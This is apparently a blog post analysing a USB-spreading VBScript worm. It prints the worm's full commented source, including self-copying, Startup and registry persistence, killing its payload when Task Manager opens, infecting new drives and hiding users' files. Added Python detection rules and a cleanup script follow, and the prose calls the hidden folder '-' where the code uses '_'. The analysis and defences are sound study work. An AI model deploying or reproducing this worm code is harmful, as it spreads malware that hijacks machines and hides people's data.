
Reading the Source Code of a Common USB Flash Drive Virus

2018-03-02 21:44, 423 views

Contents

1. Symptoms
2. Reading the source code
2.1 The shortcut file
2.2 The movemenoreg.vbs file
2.3 The helper.vbs file
2.4 The installer.vbs file
3. How it works
3.1 From USB drive to computer
3.2 From computer to USB drive
4. Summary

1. Symptoms

On an infected USB drive the virus creates two hidden directories and one shortcut file in the drive's root. The two hidden directories are named "-" and "WindowsServices". The directory named "-" holds every file that was originally on the user's drive; the directory named "WindowsServices" holds three virus files, named:
movemenoreg.vbs
installer.vbs
helper.vbs
(The source code shows that there are really four files; the fourth is
WindowsServices.exe
, which simply was not present on my drive.) The shortcut file has the same name as the user's USB drive.

2. Reading the source code

2.1 The shortcut file

The shortcut file is only an entry point: it misleads the user into clicking it, which launches the virus's main file. The shortcut's target is:

%COMSPEC% /C .\WindowsServices\movemenoreg.vbs


Here
%COMSPEC%
is an environment variable that refers to
C:\Windows\system32\cmd.exe
, so the shortcut uses
cmd.exe
to open the virus file
movemenoreg.vbs


2.2 The movemenoreg.vbs file

'When an error occurs, continue with the next statement
on error resume next
'Declare a series of variables
Dim  strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'Get a WScript.Shell object
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

'Open the directory named '-' in the drive root, i.e. the directory that really holds all of the user's files
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'Chr(34) is a double quote
ws.Run Chr(34) & pfolder & "\_" & Chr(34)

AppData = ws.ExpandEnvironmentStrings("%AppData%")

DestFolder = AppData & Target

'Create the destination directory, i.e. %AppData%\WindowsServices
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
end if

'Copy the four virus files to the destination directory and hide them, then hide the destination directory itself
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39

sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
'Copy the file
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

'Hide the file (attribute value 39: archive, system, hidden)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if

end if
end sub

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'Look through the running processes for helper.vbs; if it is already running, exit this script
For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next

'Run helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)

Set ws = Nothing


2.3 The helper.vbs file

on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")

nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'Get the path of the user's Startup folder
startupPath = ws.SpecialFolders("startup")

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

MyScript = "helper.vbs"

While True
'Check whether the registry has already been modified; if not, modify the startup entry in the registry
key = Empty
key = ws.regread (nkey)
If (not IsEmpty(key)) then

ws.RegWrite nkey, 2, "REG_BINARY"
End if

If (not objws.fileexists(startupPath & "\helper.lnk")) then
'Create a startup shortcut for helper.vbs in the Startup folder
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
link.WorkingDirectory = strPath
link.Save
End If

Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

'Check whether installer.vbs is running; if not, run installer.vbs
call procheck(colProcess, "installer.vbs")

Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")

if colProcess.count = 0 And tskProcess.count = 0  then
'Run WindowsServices.exe
ws.Run miner, 0

ElseIf colProcess.count > 0 And tskProcess.count > 0 then

'If the user has opened Task Manager, kill WindowsServices.exe
For Each objProcess In colProcess
ws.run "taskkill /PID " & objProcess.ProcessId , 0
Next

end if
WScript.Sleep 3000
Wend

'---------------------------------------------------------------------------------

sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

if instr(vaprocess, procname) then
Exit sub
End if

Next

ws.Run Chr(34) & strPath & procname & Chr(34)

end sub

'--------------------------------------------------------------------------------

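As an added example (not code from the original post), the following Python script turns the helper.vbs behaviour above into detection rules and runs them over a constructed process-creation log: a script host launching one of the three dropper names from a WindowsServices folder, the %AppData%\WindowsServices\WindowsServices.exe payload started by wscript.exe, and a taskkill spawned by wscript.exe within seconds of Taskmgr.exe starting (the loop that hides the payload while Task Manager is open). The log lines, the user name, the drive letter and the PID are constructed; the rule names and the five-second window are my own choices, not anything from the post.

```python
"""Detection rules for the helper.vbs behaviour, run over constructed
process-creation records. Added example, not code from the original post.

Record format (constructed): <ISO time>|<image path>|<command line>|<parent image>
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log: the shortcut is run from drive E:, the droppers land
# in %AppData%, Task Manager is opened later and the payload gets killed.
SAMPLE_LOG = r"""
2018-03-02T21:44:00|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "E:\WindowsServices\movemenoreg.vbs"|C:\Windows\System32\cmd.exe
2018-03-02T21:44:01|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Roaming\WindowsServices\helper.vbs"|C:\Windows\System32\wscript.exe
2018-03-02T21:44:02|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Roaming\WindowsServices\installer.vbs"|C:\Windows\System32\wscript.exe
2018-03-02T21:44:05|C:\Users\alice\AppData\Roaming\WindowsServices\WindowsServices.exe|"C:\Users\alice\AppData\Roaming\WindowsServices\WindowsServices.exe"|C:\Windows\System32\wscript.exe
2018-03-02T21:50:10|C:\Windows\System32\Taskmgr.exe|"C:\Windows\System32\Taskmgr.exe"|C:\Windows\explorer.exe
2018-03-02T21:50:12|C:\Windows\System32\taskkill.exe|taskkill /PID 4412|C:\Windows\System32\wscript.exe
2018-03-02T21:55:00|C:\Windows\System32\notepad.exe|"C:\Windows\System32\notepad.exe"|C:\Windows\explorer.exe
"""

SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
WORM_SCRIPTS = ("movemenoreg.vbs", "installer.vbs", "helper.vbs")


@dataclass
class ProcEvent:
    time: datetime
    image: str
    cmdline: str
    parent: str


@dataclass
class Alert:
    rule: str
    time: datetime
    detail: str


def parse_events(text):
    """Parse the pipe-separated records into ProcEvent objects."""
    events = []
    for line in text.strip().splitlines():
        when, image, cmdline, parent = line.split("|", 3)
        events.append(ProcEvent(datetime.fromisoformat(when), image, cmdline, parent))
    return events


def run_rules(events, kill_window=timedelta(seconds=5)):
    """Apply the three rules and return the alerts they raise."""
    alerts = []
    taskmgr_starts = [e.time for e in events if e.image.lower().endswith("\\taskmgr.exe")]
    for e in events:
        img, cmd, par = e.image.lower(), e.cmdline.lower(), e.parent.lower()
        # Rule 1: a script host running one of the dropper names out of a
        # WindowsServices folder (on the USB drive or under %AppData%).
        if (img.endswith(SCRIPT_HOSTS) and "\\windowsservices\\" in cmd
                and any(s in cmd for s in WORM_SCRIPTS)):
            alerts.append(Alert("script_from_windowsservices", e.time, e.cmdline))
        # Rule 2: the payload started from the %AppData% copy by a script host
        # (helper.vbs runs it with ws.Run miner, 0, i.e. with a hidden window).
        if "\\appdata\\roaming\\windowsservices\\" in img and par.endswith(SCRIPT_HOSTS):
            alerts.append(Alert("payload_from_appdata", e.time, e.image))
        # Rule 3: taskkill spawned by a script host shortly after Task Manager
        # started, the loop that hides the payload while Taskmgr.exe is open.
        if (img.endswith("\\taskkill.exe") and par.endswith(SCRIPT_HOSTS)
                and any(timedelta(0) <= e.time - t <= kill_window for t in taskmgr_starts)):
            alerts.append(Alert("taskkill_after_taskmgr", e.time, e.cmdline))
    return alerts


def rule_counts(alerts):
    """Tally alerts per rule, the shape a dashboard or a test wants."""
    counts = {}
    for a in alerts:
        counts[a.rule] = counts.get(a.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for alert in run_rules(parse_events(SAMPLE_LOG)):
        print(alert.time.isoformat(), alert.rule, alert.detail)
```

On a live host the same names are the host-side indicators the script leaves behind: the %AppData%\WindowsServices folder, helper.lnk in the Startup folder, and the StartupApproved\StartupFolder\helper.lnk registry value; the log rules are the part that can be exercised offline.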

2.4 The installer.vbs file

The installer.vbs file's main job is to infect new USB drives.

on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)

'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'Subscribe to logical disk events
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

While True

'Check whether helper.vbs is running; if not, run helper.vbs
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")

'Fetch the next event
Set objEvent = colEvents.NextEvent

If objEvent.TargetInstance.DriveType = 2  Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
'A new USB drive has been inserted
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
'Create the destination directory (\WindowsServices) in the drive's root
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 39
end if

'Move the four virus files to the destination directory
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")

'Create a shortcut in the drive's root that opens movemenoreg.vbs
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
link.windowstyle = 7
link.Save
End If

'Create the directory named '-' in the drive's root and hide it
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
End If
set check = objws.getFolder(device)
'Move all of the user's files into the directory named '-'
Call checker(check)

End If
End If

Wend

sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select

Next

set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws.MoveFolder home, DummyFolder & "\"
End Select

Next

end sub

'------------------------------------------------------------

sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if

end if
end sub

'------------------------------------------------------------

sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

if instr(vaprocess, procname) then
Exit sub
End if

Next
ws.Run Chr(34) & strFolder  & "\" & procname & Chr(34)
end sub

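Bringing sections 2.1, 2.2 and 2.4 together, here is an added Python example (not code from the original post) for triaging and cleaning a drive that carries this layout. It decodes the attribute value 39 the scripts set (read-only, hidden, system and archive), scans a drive root for the WindowsServices dropper folder, the hidden folder the code names `_`, and a root .lnk whose argument string runs .\WindowsServices\movemenoreg.vbs, and then reverses checker()/moveandhide() by moving the user's files back to the root, quarantining the dropper folder off the drive and deleting the shortcut. The sample drive, its file names and the fake .lnk bytes are constructed for the demonstration. The hidden/system/read-only bits are not cleared here, since that needs the Windows attrib command (attrib -r -s -h) rather than portable file operations.

```python
"""Triage and clean-up for the drive layout created by the scripts above.
Added example, not code from the original post. It uses only names and file
bytes, so it runs on any OS against a mounted drive or an extracted image."""
import shutil
import tempfile
from pathlib import Path

WORM_FILES = {"movemenoreg.vbs", "installer.vbs", "helper.vbs", "windowsservices.exe"}
LNK_MARKER = r".\WindowsServices\movemenoreg.vbs"  # shortcut argument from section 2.1
# Scripting.FileSystemObject attribute bits; the scripts add 39 = 1 + 2 + 4 + 32.
FSO_ATTRIBUTES = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}


def decode_attributes(value):
    """Name the bits set in an FSO Attributes value, e.g. the 39 used above."""
    return [name for bit, name in FSO_ATTRIBUTES.items() if value & bit]


def lnk_targets_worm(lnk_path):
    """Shell links store target and arguments as UTF-16LE strings (ANSI in old
    links); a byte search for the marker in both encodings is enough for triage."""
    data = Path(lnk_path).read_bytes()
    return LNK_MARKER.encode("utf-16-le") in data or LNK_MARKER.encode("ascii") in data


def scan_drive(root):
    """Report which indicators are present under the drive root."""
    root = Path(root)
    services = root / "WindowsServices"
    droppers = sorted(p.name for p in services.iterdir()
                      if p.name.lower() in WORM_FILES) if services.is_dir() else []
    lnks = sorted(p.name for p in root.glob("*.lnk") if lnk_targets_worm(p))
    return {"dropper_files": droppers, "root_lnk": lnks,
            "hidden_user_dir": (root / "_").is_dir(),
            "infected": bool(droppers) and bool(lnks)}


def _unique(dest):
    candidate, n = dest, 1
    while candidate.exists():
        candidate = dest.with_name(f"{dest.stem} (restored {n}){dest.suffix}")
        n += 1
    return candidate


def restore_drive(root, quarantine):
    """Reverse checker()/moveandhide(): user files back to the root, dropper
    folder parked off the drive for analysis, trigger shortcut deleted."""
    root, quarantine = Path(root), Path(quarantine)
    report = {"restored": [], "renamed": [], "quarantined": False, "lnk_removed": []}
    hidden = root / "_"
    if hidden.is_dir():
        for item in list(hidden.iterdir()):
            dest = root / item.name
            if dest.exists():
                # A file saved to the root after infection collides with the
                # restored copy; keep both rather than silently overwrite either.
                dest = _unique(dest)
                report["renamed"].append(dest.name)
            shutil.move(str(item), str(dest))
            report["restored"].append(item.name)
        hidden.rmdir()
    services = root / "WindowsServices"
    if services.is_dir():
        quarantine.mkdir(parents=True, exist_ok=True)
        shutil.move(str(services), str(quarantine / "WindowsServices"))
        report["quarantined"] = True
    for lnk in list(root.glob("*.lnk")):
        if lnk_targets_worm(lnk):
            lnk.unlink()
            report["lnk_removed"].append(lnk.name)
    return report


def build_sample_drive(base):
    """Constructed sample: the infected layout plus a notes.txt the user wrote at
    the root after infection. The .lnk is a stand-in (4-byte header plus the
    UTF-16LE argument string), not a real shell link."""
    root = Path(base) / "USBDISK"
    (root / "_" / "docs").mkdir(parents=True)
    (root / "_" / "docs" / "report.docx").write_bytes(b"user data")
    (root / "_" / "notes.txt").write_text("original notes\n")
    (root / "notes.txt").write_text("written after infection\n")
    (root / "System Volume Information").mkdir()
    (root / "WindowsServices").mkdir()
    for name in ("movemenoreg.vbs", "installer.vbs", "helper.vbs"):
        (root / "WindowsServices" / name).write_text("' dropper placeholder\n")
    (root / "USBDISK.lnk").write_bytes(b"L\x00\x00\x00" + ("/C " + LNK_MARKER).encode("utf-16-le"))
    return root


def run_demo():
    """Scan, clean and re-scan the constructed drive; return all three results."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_drive(tmp)
        before = scan_drive(root)
        report = restore_drive(root, Path(tmp) / "quarantine")
        after = scan_drive(root)
        after["root_entries"] = sorted(p.name for p in root.iterdir())
    return before, report, after
```

Running `run_demo()` scans the constructed drive, restores it and scans again; the quarantine folder is placed outside the drive root so that the droppers stay available for analysis without being carried to the next machine.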

3. How it works

3.1 From USB drive to computer

An infected USB drive -> the user clicks the shortcut in the drive's root -> the virus copies itself to the
%AppData%\WindowsServices
directory, adds itself to the startup items and keeps polling for newly inserted USB drives; as soon as a new drive is inserted, it copies the virus files onto it.

3.2 From computer to USB drive

An infected computer -> the USB virus starts together with the computer -> the virus detects a newly inserted USB drive -> the virus creates the "-" and "WindowsServices" directories in the new drive's root, copies all of the user's existing files into "-", copies the four virus code files into "WindowsServices", and creates a shortcut in the drive's root that opens the virus file
movemenoreg.vbs

4. Summary

As the saying goes, a sparrow may be small but it has all its organs: in fewer than three hundred lines of code this virus can infect a host, find new hosts and resist being killed;

the variable naming and the division of functionality in the code are quite sensible, and it is clear that whoever wrote this virus was well practised in VBS programming and in writing viruses;

because the virus file
WindowsServices.exe
is missing, we cannot know what the author's real goal was, but from the line in
helper.vbs
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
we can guess that it is probably a cryptocurrency miner.

Note: this article analyses the virus's source code solely for learning and for sharing knowledge; the author bears no responsibility for any consequences!